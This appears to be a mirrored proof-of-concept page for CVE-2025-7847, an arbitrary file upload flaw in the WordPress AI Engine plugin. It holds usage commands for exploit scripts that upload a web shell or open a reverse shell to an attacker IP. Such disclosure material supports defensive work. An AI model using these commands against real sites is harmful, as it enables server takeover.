Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-7847 PoC — WordPress plugin AI Engine 代码问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin AI Engine 代码问题漏洞 (CVE-2025-7847)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin AI Engine 2.9.3和2.9.4版本存在代码问题漏洞,该漏洞源于rest_simpleFileUpload函数未验证文件类型,可能导致任意文件上传和远程代码执行。
Description
Wordpress Plugin AI Engine 2.9.3 - 2.9.4  Proof Of Concept
Readme
# CVE-2025-7847 Wordpress Plugin Authenticated Subscriber Arbitrary File Upload POC
Wordpress Plugin AI Engine 2.9.3 - 2.9.4  Proof Of Concept

Please note that this vulnerability can only be exploited if the “Public API” option is enabled, which is disabled by default, and no Bearer Token is configured, nor is custom authentication added and used to protect the API. 

# Automate Version
```
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
```
# Web Shell Upload Only
```
python3 exploit.py \                                                                                                                          
  --url "http://target.com/" \
  --username "Admin" \
  --password "L87*********C4u" \
  --file shell.php
```
File Snapshot

[4.0K] /data/pocs/9ae39d8a8d3fdeafbdb2b0252378296fcc1aea49 ├── [4.9K] exploit-auto.py ├── [1.9K] exploit-manual.py ├── [4.0K] exploit.py ├── [ 34K] LICENSE ├── [ 846] README.md ├── [ 73] reverse.php └── [ 31] shell.php 0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.